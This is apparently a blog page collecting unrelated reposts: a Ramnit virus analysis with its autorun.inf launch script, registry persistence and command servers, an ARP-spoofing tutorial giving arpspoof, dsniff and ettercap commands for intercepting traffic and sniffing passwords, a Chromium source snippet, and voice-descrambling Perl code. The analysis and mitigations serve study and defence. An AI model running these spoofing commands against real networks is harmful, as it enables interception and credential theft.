Monday, March 21, 2016

VIRUS.WIN32.RAMNIT.A

by Atlantis on April 12th, 2012 in Malware Descriptions.
Detect: Virus.Win32.Ramnit.a
Platform: Win32
Type: Virus
Size: 103936 bytes
Language: C++
md5: CDF0778E1B80069D137A3E7A0C7C787F
sha1: E1826123B190C1FB3D11BBEA33EF6D1CCEABAD43
Summary
It is a malicious program which infects files on a User's PC.
Technical Details
Spreading over Removable Storage Devices
On all removable storage devices connected to the infected computer, the virus creates the following files:
:\Recycler\S-\.cpl (3584 bytes)
:\Recycler\S-\.exe (56832 bytes)
:\Copy of Shortcut to (1).lnk (691 bytes)
:\Copy of Shortcut to (2).lnk (722 bytes)
:\Copy of Shortcut to (3).lnk (858 bytes)
:\Copy of Shortcut to (4).lnk (867 bytes)
:\autorun.inf (11964 bytes)
where
  •  — is a digit identifier (e.g.: "1-4-83-4678327503-5842818778-105234524-7024"),
  •  — random Latin alphabet sequences (e.g.: "xVgGwSIp", "lwTCZgQP").
The "autorun.inf" file contains a malicious script:
[autorun]
action=Open
icon=%WinDir%\system32\shell32.dll,4
shellexecute=\RECYCLER\S-\.exe
shell\explore\command=\RECYCLER\S-\.exe
USEAUTOPLAY=1
shell\Open\command=\RECYCLER\S-\.exe
The script is executed each time the user opens the infected disk using the Windows Explorer if the autoplay function is turned on. Being executed, the script launches the ".exe" file. Shortcuts created by the malicious program are exploits which use the CVE-2010-2568 vulnerability. In the "shell32.dll" library, this vulnerability consists in error of the shortcut processing (lnk and .pif files) and allows launching a code of random Windows libraries when hitting icons to open programs by the Windows Explorer. The code of the ".cpl" library is launched. Being executed, it launches the ".exe" file. The malicious program prevents modifying the files described above and creates them in an endless cycle.
File Infection
The virus infects files with the following extensions:
exe
html
dll
htm
Executive files and Windows dynamic link libraries are infected by adding the virus body in the end of the last PE-section of the target file. With that, an entry point to the program changes in such a way as to allow the virus code to manage it. While infecting the HTML, HTM files, the following script is added in the end of the target document:
Thus, upon each launch, the virus body is saved to the current user's temporary folder as
%Temp%\svchost.exe
and launched for execution.
Payload
Once the infected file is launched, the Trojan decrypts and extracts the following file from its body:
%WorkDir%\Srv.exe
Then, the created file is launched for execution. With that, a copy of the file is created and launched:
%Program Files%\Microsoft\WaterMark.exe
Then, the "WaterMark.exe" process launches an example of the "svchost.exe" system process and injects its code into this process which performs the following actions:
  • Creates a unique identifier with the following name to control the uniqueness of its process in the system:
    Global\SYSTEM_DEMETRA_MAIN
  • Modifies a registry key value to automatically run a malicious software copy created earlier:
    [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Userinit" = "%System%\userinit.exe,,%Program files%\microsoft\watermark.exe"
    With that, the copy is launched by the "winlogon.exe" process even if a computer starts in a safe mode.
  • Prevents modifying autorun registry key as well as the "WaterMark.exe" file.
  • Creates a configuration file to store the current settings of the malicious software:
    %System%\dmlconf.dat
  • Visit the following resource to check for a connection to the Internet:
    google.com
  • Realizes the backdoor. To get a list of commands, it connects to the servers:
    tybdtyutjfyvetscev.com
    ervwetyrbuyouiylkdhrbt.com
    tybsyiutnrtvtybdrser.com
    Depending on the command(s) get from the intruder, the backdoor can perform the following actions:
    - upload files to the infected computer and launch them for execution.
    - connect to another server to get commands.
  • The code injected into the address space of the "svchost.exe" process executes a functionality described in the Spreading over Removable Storage Devices and File Infection sections.
Removal Recommendations
To delete a malicious program, proceed through the steps listed below:
  1. Run a full scan of your computer using the Antivirus program with the updated definition database.
  2. Do not launch the EXE, HTM, HTML files and do not reboot your computer until a full scan is complete.
  3. Restore the infected files from the backup copies.
  4. Restore the registry key value (How to Work with System Registry):
    [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Userinit" = "userinit.exe"
  5. Delete the following files:
    :\Recycler\S-\.cpl (3584 bytes)
    :\Recycler\S-\.exe (56832 bytes)
    :\Copy of Shortcut to (1).lnk (691 bytes)
    :\Copy of Shortcut to (2).lnk (722 bytes)
    :\Copy of Shortcut to (3).lnk (858 bytes)
    :\Copy of Shortcut to (4).lnk (867 bytes)
    :\autorun.inf (11964 bytes)
    %Temp%\svchost.exe
    %WorkDir%\Srv.exe
    %Program Files%\Microsoft\WaterMark.exe
  6. Delete the original Trojan file (its file name and location depends on the way the Trojan originally penetrated a user’s computer).
  7. Delete an original Trojan file (its location on the infected PC depends on the way the program has been installed on the PC).
  8. Clean the Temporary Internet Files folder which contains infected files
at No comments:

ARP Spoofing using Dsniff Tools and Ettercap

A quick demonstration of ARP Spoofing using Dsniff Tools and Ettercap

     Let's start by using Dug Song's Arpspoof program that comes with his Dsniff package. I use the *nix version but if you look around you may be able to find a Win32 version. The easiest way to run Dsniff is to boot from a BackTrack boot CD. The first thing you should do is make sure packet forwarding is turned on, otherwise our machine will drop all traffic between the hosts we are trying to sniff, causing a denial of service. Some of the tools I use do this automatically (Like Ettercap), but to be sure, you may want to do it yourself. Use the following commands, depending on operating system:

Linux:
echo 1 > /proc/sys/net/ipv4/ip_forward

BSD:
sysctl -w net.inet.ip.forwarding=1

     Now that your computer will forward the traffic you can start ARP Spoofing. Let's assume you want to sniff all traffic between a host and the gateway so you can see the traffic it's sending to the Internet. To get traffic in both directions you would use the following two commands:

arpspoof -t 192.168.1.1 192.168.1.2 & >/dev/null
arpspoof -t 192.168.1.2 192.168.1.1 & >/dev/null

     The "& >/dev/nul" part is there to make it easier to run from one terminal, but you may want to omit it for debugging purposes. Now you can use any package you wish to sniff the connection. To start with I'd recommend using the Sniffer Dsniff that comes along with Arpspoof to sniff for plain text passwords. To start sniffing with Dsniff just drop out to a command shell and type:

dsniff

     As Dsniff finds passwords and usernames it will print them to the screen. To look at all sorts of other traffic I would recommend TCPDump or Wireshark. When you are ready to stop ARP Spoofing issue the following command:

killall arpspoof

     This should kill the two instances of Arpspoof started above.
    Another great tool is Ettercap, the Swiss army knife of ARP Poisoning and password sniffing. I usually use it in non-interactive mode, but by default it has a ncurses interface that some may find easier to use. If you would like to use Ettercap for ARP poisoning instead, the following commands should serve as good examples. If we wanted to target all hosts on the network and sniff traffic between every node, we would use the following command:

ettercap -T -q -M ARP // //

    Be careful with the above command, having all of the traffic on a large network going though one slow computer can really bog down network connections. If we had a specific victim in mind, let's say a host with the IP 192.168.1.1, we would use this command:

ettercap -T -q -M ARP /192.168.1.1/ //

If 192.168.1.1 is the gateway, we should be able to see all outgoing traffic. Here are what the command line option flags do:

-T tells Ettercap to use the text interface, I like this option the best as the more GUI modes are rather confusing.
-q tells Ettercap to be more quiet, in other words less verbose.
-M tells Ettercap the MITM (Man in the Middle) method we want to use, in this case ARP poisoning.
For some other things you can do with Ettercap check out my video Fun with Ettercap Filters: The Movie.

Other Tools

     There are many other packages I would like to mention as well. The first is Cain, which Windows users will be much more comfortable with. It has some great functionality and a nice interface. I have a video tutorial on how to use it here:
    If you like pretty GUIs, Cain is the way to go. It does not have as many options as Ettercap, but it's still pretty cool and has some other Windows specific extras built in.
    There are also specialized snuffers for certain kinds of content. Driftnet parses out the images people are seeing as they web surf .I've not done a video on Driftnet, but I have done one on NetworkActive which can also parse out images from web traffic:
    These also sniffers like P0f that let you finger the OS of network traffic passively:
    And that's just the tip of the iceberg when it comes to specialized sniffers.

Mitigating Sniffing Attacks

     There are quite a few ways to mitigate sniffing attacks.

1. Avoid using insecure protocols like Basic HTTP authentication and Telnet. As a matter of fact you should sniff your own network to see what passwords the tools listed above can pick up.
2. If you have to use an insecure protocol, try tunneling it though something to encrypt the sensitive data. I have a video on SSH Dynamic Port Forwarding that show one way to accomplish this.
3. Look into using Static ARP tables between critical workstations and servers. They are more trouble to maintain but limit arpspoofing.
4. Run software like ARPWatch to detect changes in MAC addresses on your network that may point to Sniffers.
5. Try running tools like Sniffdet and Sentinel to detect network cards in promiscuous mode that may be running sniffing software.
6. Have outside laptops using Wi-Fi that come into your facility use a VPN to connect to the network.
7. Lockdown workstations so users can't install sniffing software or boot from a CD like Knoppix.
8. Keep public terminals on a separate LAN from the staff workstations and servers.

I hope you have found this article useful.

Further research:

ARPWatch
http://www-nrg.ee.lbl.gov/ 
at No comments:

Thursday, March 17, 2016

keyboard wrapper migration - fuckin' Keyscore 

void Document::setUseSecureKeyboardEntryWhenActive(bool usesSecureKeyboard)
{
    if (m_useSecureKeyboardEntryWhenActive == usesSecureKeyboard)
        return;

    m_useSecureKeyboardEntryWhenActive = usesSecureKeyboard;
    m_frame->selection().updateSecureKeyboardEntryIfActive();
}

bool Document::useSecureKeyboardEntryWhenActive() const
{
    return m_useSecureKeyboardEntryWhenActive;
}

void Document::initSecurityContext(const DocumentInit& initializer)
{
    ASSERT(!getSecurityOrigin());

    if (!initializer.hasSecurityContext()) {
        // No source for a security context.
        // This can occur via document.implementation.createDocument().
        m_cookieURL = KURL(ParsedURLString, emptyString());
        setSecurityOrigin(SecurityOrigin::createUnique());
        initContentSecurityPolicy();
        // Unique security origins cannot have a suborigin
        return;
    }

    // In the common case, create the security context from the currently
    // loading URL with a fresh content security policy.
    enforceSandboxFlags(initializer.getSandboxFlags());
    if (initializer.shouldEnforceStrictMixedContentChecking())
        enforceStrictMixedContentChecking();
    setInsecureRequestsPolicy(initializer.getInsecureRequestsPolicy());
    if (initializer.insecureNavigationsToUpgrade()) {
        for (auto toUpgrade : *initializer.insecureNavigationsToUpgrade())
            addInsecureNavigationUpgrade(toUpgrade);
    }

    if (isSandboxed(SandboxOrigin)) {
        m_cookieURL = m_url;
        setSecurityOrigin(SecurityOrigin::createUnique());
        // If we're supposed to inherit our security origin from our
        // owner, but we're also sandboxed, the only things we inherit are
        // the origin's potential trustworthiness and the ability to
        // load local resources. The latter lets about:blank iframes in
        // file:// URL documents load images and other resources from
        // the file system.
        if (initializer.owner() && initializer.owner()->getSecurityOrigin()->isPotentiallyTrustworthy())
            getSecurityOrigin()->setUniqueOriginIsPotentiallyTrustworthy(true);
        if (initializer.owner() && initializer.owner()->getSecurityOrigin()->canLoadLocalResources())
            getSecurityOrigin()->grantLoadLocalResources();
    } else if (initializer.owner()) {
        m_cookieURL = initializer.owner()->cookieURL();
        // We alias the SecurityOrigins to match Firefox, see Bug 15313
        // https://bugs.webkit.org/show_bug.cgi?id=15313
        setSecurityOrigin(initializer.owner()->getSecurityOrigin());
    } else {
        m_cookieURL = m_url;
        setSecurityOrigin(SecurityOrigin::create(m_url));
    }

    // Set the address space before setting up CSP, as the latter may override
    // the former via the 'treat-as-public-address' directive (see
    // https://mikewest.github.io/cors-rfc1918/#csp).
    if (initializer.isHostedInReservedIPRange()) {
        setAddressSpace(getSecurityOrigin()->isLocalhost() ? WebAddressSpaceLocal : WebAddressSpacePrivate);
    } else {
        setAddressSpace(WebAddressSpacePublic);
    }

    if (importsController()) {
        // If this document is an HTML import, grab a reference to it's master document's Content
        // Security Policy. We don't call 'initContentSecurityPolicy' in this case, as we can't
        // rebind the master document's policy object: its ExecutionContext needs to remain tied
        // to the master document.
        setContentSecurityPolicy(importsController()->master()->contentSecurityPolicy());
    } else {
        initContentSecurityPolicy();
    }

    if (getSecurityOrigin()->hasSuborigin())
        enforceSuborigin(getSecurityOrigin()->suboriginName());

    if (Settings* settings = initializer.settings()) {
        if (!settings->webSecurityEnabled()) {
            // Web security is turned off. We should let this document access every other document. This is used primary by testing
            // harnesses for web sites.
            getSecurityOrigin()->grantUniversalAccess();
        } else if (getSecurityOrigin()->isLocal()) {
            if (settings->allowUniversalAccessFromFileURLs()) {
                // Some clients want local URLs to have universal access, but that setting is dangerous for other clients.
                getSecurityOrigin()->grantUniversalAccess();
            } else if (!settings->allowFileAccessFromFileURLs()) {
                // Some clients do not want local URLs to have access to other local URLs.
                getSecurityOrigin()->blockLocalAccessFromLocalOrigin();
            }
        }
    }

https://code.google.com/p/chromium/codesearch#chromium/src/third_party/WebKit/Source/core/dom/Document.cpp&q=keyboard%20wrapper%20migration&sq=package:chromium&type=cs&l=4935
at No comments:

Voice descrambler

This program descrambles band inverted encrypted transmissions, usually found on VHF/UHF. It uses a NCO (numerical controlled oscillator) to re-produce the originally inverted audio band. Use it only if legally permitted in your country. I assume no responsabilities deriving from its use. Standard disclaimer applies

 http://www.dxzone.com/dx16133/voice-descrambler.html
at No comments:

Descrambling the voice inversion scrambler


http://www.windytan.com/2013/05/descrambling-voice-inversion.html

Voice inversion is a method of scrambling radio conversations to render speech nearly unintelligible in ordinary radio receivers. As the name implies, it inverts the audio spectrum of a signal, making the lowest frequencies the highest and vice versa. It is not considered encryption; it's merely a sort of Pig Latin on analogue signals. Several voice scramblers utilize it, like the Selectone ST-20.
[Image: A spectrogram of speech, with a cut labeled 'voice inversion' in the middle of the time axis, after which the spectrum appears to be flipped upside down.]
Voice inversion is cancelled by reapplying the inversion, i.e. inverting the audio spectrum again. Here I'll present some least-effort digital descrambling methods for the voice inversion scrambler that may be of interest to hobbyist listeners. The examples are written in Perl.

Easy

In a digitally sampled signal, whole-spectrum inversion can be achieved very easily in the time domain by multiplying every other sample by −1. This is equivalent to amplitude modulating aNyquist frequency carrier with the signal; the upper sideband will get inverted and nicely overlaid with the lower because of symmetric folding.
open(IN, "sox scrambled.wav -r 8600 -c 1 -t .s16 -|");
open(OUT,"|sox -r 8600 -c 1 -t .s16 - descrambled.wav");
$n = 1;
 
while (not eof IN) {
  read IN, $a, 2;
  print OUT pack("s",unpack("s",$a) * $n);
  $n *= -1;
}
Because the whole spectrum is inverted, a sampling rate has to be chosen to (approximately) match the signal bandwidth. Slight distortion will still remain, unless the chosen Nyquist frequency perfectly matches the inverted zero frequency of the signal, or the "inversion carrier" as Selectone calls it. But speech will nevertheless be much more intelligible than in the original scrambled signal.
For example, consider a scrambled piece of audio that seems to have its highest frequency components at 4300 Hz. We would need to resample the audio at a rate of 8600 Hz and multiply every other sample by −1 to get intelligible audio.
To make things simpler, the Selectone ST-20B supports eight discrete carrier frequencies, namely 2632, 2718, 2868, 3023, 3196, 3339, 3495, and 3729 Hz, which they claim to be "the most commonly used inversion formats".

Difficult

If resampling is out of the question, we can also multiply the samples with a sine wave oscillating at the seemingly highest scrambled frequency. This will produce two sidebands; the lower will be our descrambled audio and will be conveniently at baseband. The upper sideband contains the inverted signal, but at such a high frequency it should not significantly impede intelligibility. We could improve the audio further by silencing the upper sideband using a lowpass filter.
$fs = 48000; # sample rate
$fc = 3729;  # carrier frequency
$filter = " sinc -$fc"; # optional LP filter
 
$fc = freq($fc);
 
open(IN, "sox scrambled.wav -c 1 -b 16 -e signed -t .raw -|");
open(OUT,"|sox -r $fs -c 1 -b 16 -e signed -t .raw - descrambled.wav".
         $filter);
 
while (not eof IN) {
 
  $acc += $fc;
  $acc -= 65536 if ($acc > 32767);
 
  read(IN,$a,2);
  print OUT pack("s",unpack("s",$a) * sin($acc/32768*3.141592653589793));
}

sub freq { int(.5 + $_[0] * 65536 / $fs); }

A word about split-band scrambling

Some scramblers, like the PCD4440T, use a split-band inversion where the audio is split into two frequency bands that are then inverted separately and combined. The split frequency is user-adjustable. This is not a significant improvement; it would only require us to do the digital deinversion in two parts with different parameters.

Results

And here's a demo of what it sounds like. We begin with a (fake) scrambled message. Then the easy descramble comes on with a 1000 Hz error in the selected sampling rate; then the easy descramble with an error of 300 Hz; and the difficult method with a spot-on carrier frequency and with the upper sideband also audible. In the end, we also filter out the unwanted upper sideband.
at No comments:
Subscribe to: Posts (Atom)